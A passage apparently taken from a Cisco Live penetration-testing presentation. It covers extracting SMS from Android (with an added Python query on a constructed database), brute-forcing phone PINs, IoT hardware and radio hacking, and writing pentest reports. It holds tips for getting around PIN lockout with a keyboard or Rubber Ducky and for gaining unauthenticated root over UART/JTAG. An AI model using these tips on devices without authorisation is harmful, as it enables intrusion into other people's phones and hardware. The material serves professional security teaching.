| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54     | Hello Randy! Where should I send my Cisco live presentation? |
| 2017-10-20 16:34:03 | 2017-01-01 02:00:00 |        | Damn, thanks ! for texting jet                               |
| 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54     | Jet? When you are a Jet, you’re a jet? West Side??           |
|                     |                     |        | Stupid auto correct!                                         |
|                     |                     |        | I’m going to dropkick you Joey ... And this phone            |
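The slide's query, run end to end against a constructed stand-in for mmssms.db. This is an added example, not code from the deck: the `sms` table, its sample rows and the `read_thread` helper are constructed here, with `thread_id` passed as a bind parameter instead of the hard-coded 310.

```python
"""Run the slide's Android SMS query against a constructed mmssms.db.

Added example, not from the BRKSEC-2460 deck. It builds an in-memory copy of
the `sms` table with only the columns the slide's query uses and runs the
same SELECT with thread_id as a bind parameter instead of the hard-coded 310.
"""
import sqlite3
from datetime import datetime, timezone

def epoch_ms(*ymdhms: int) -> int:
    """Android stores date/date_sent as milliseconds since the Unix epoch."""
    return int(datetime(*ymdhms, tzinfo=timezone.utc).timestamp() * 1000)

# Constructed sample rows: (thread_id, date, date_sent, person, body).
# date_sent = 0 is typical for outgoing messages and renders as 1970-01-01.
SAMPLE_ROWS = [
    (310, epoch_ms(2017, 10, 20, 13, 48, 18), epoch_ms(2017, 10, 20, 13, 48, 16),
     54, "Hello Randy! Where should I send my presentation?"),
    (310, epoch_ms(2017, 10, 20, 16, 34, 3), 0, None, "Thanks for texting"),
    (311, epoch_ms(2017, 10, 20, 16, 40, 2), epoch_ms(2017, 10, 20, 16, 40, 1),
     99, "Different thread; must not be returned"),
]

def open_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for mmssms.db; use sqlite3.connect(path) on a copy of a real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sms (thread_id INTEGER, date INTEGER, "
                 "date_sent INTEGER, person INTEGER, body TEXT)")
    conn.executemany("INSERT INTO sms VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn

def read_thread(conn: sqlite3.Connection, thread_id: int, local_time: bool = False):
    """Return (date, date_sent, person, body) rows for one thread, oldest first.

    local_time=True reproduces the slide's 'localtime' modifier; the default
    keeps UTC so the output does not depend on the host's timezone.
    """
    mods = "'unixepoch', 'localtime'" if local_time else "'unixepoch'"
    sql = (f"SELECT datetime(date/1000, {mods}), datetime(date_sent/1000, {mods}), "
           "person, body FROM sms WHERE thread_id = ? ORDER BY date")
    return conn.execute(sql, (thread_id,)).fetchall()

if __name__ == "__main__":
    for row in read_thread(open_sample_db(), 310):
        print(row)
```

On a real extraction, always query a working copy of the database file rather than the original so the evidence stays unmodified.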
Brute Force PINs
• Most phones lock if brute forced
• TIP: Plugging in a keyboard can bypass this.
• TIP2: A Rubber Ducky abuses keyboard drivers and is an effective brute force tool
Many Commercial Tools Available
• Cellebrite or Elcomsoft are good but pricey!
• Know that even professional tools have limitations!
Accessing Unauthorized Voicemail
Testing IoT
(Slide images: Hacking IoT Lightbulbs, Conference Blinky Things, Power plugs, Cameras)
Hacking IoT: Lightbulbs, Conference Blinky Things, Power plugs, Cameras
• Micro drive or plug to access hardware
• Firmware security analysis and modification
• Radio- / wireless-based exploitation
• Application exploitation
• Hardware exploitation (example JTAG)
IoT Recon
• Mobile Application Downloads
• Web dashboards and resources
• Firmware or source code
• Any available APIs
• Plugs to access hard drive / removable storage
IoT Firmware
Firmware – Code running on the hardware (bootloader, file systems, kernel, etc.)
Many devices don’t validate firmware!
Call support for help!
IoT Hardware Hacking
• Unauthenticated root is common when tapping into the hardware
• Identify UART or JTAG pins
• Use a multimeter to find ground, transmit and receive
• Connect to an exploitation tool (ATTIFY Badge) and adjust the baud rate until you can read the output. It’s likely to be unauthenticated.
Radio Interfaces
• Software Defined Radio
• ZigBee Exploitation
• Bluetooth
Example Attack Methods
• Man-in-the-middle attack
• Insecure CRC verification
• Replay attack
• Clear text
Reporting – Language is Everything
• People can be terminated
• Critical vulnerabilities could be overlooked
• Money and time could be wasted
• Choose your tone wisely
• Expect various education types to read it
• Include details (tools, time, process)
• Define acronyms
Penetration Testing Report
• Target Audience – Who will read it
• Report Classification – Could contain sensitive information
• All information collected – Need to list everything (notes, screenshots, etc.)
• Summary of findings
• Summary of recommendations
Penetration Testing Report - Details
• Vulnerabilities – What you found
• Impact – Potential damage
• Likelihood – How hard to execute
• Risk evaluation – Impact to business
• Recommendation – Remediation steps
• References – Who worked on what
• Additional details – Appendices, Glossary, Tools used, etc.
Example: Offensive Security sample report, https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
Wrap up
Threats will increase in volume and sophistication.
Next Steps
Complete your online session evaluation
Give us your feedback to be entered into a Daily Survey Drawing. Complete your session surveys through the Cisco Live mobile app or on www.CiscoLive.com/us.
Don’t forget: Cisco Live sessions will be available for viewing on demand after the event at www.CiscoLive.com/Online.
Continue your education
• Demos in the Cisco campus
• Walk-in self-paced labs
• Meet the engineer 1:1 meetings
• Related sessions
Thank you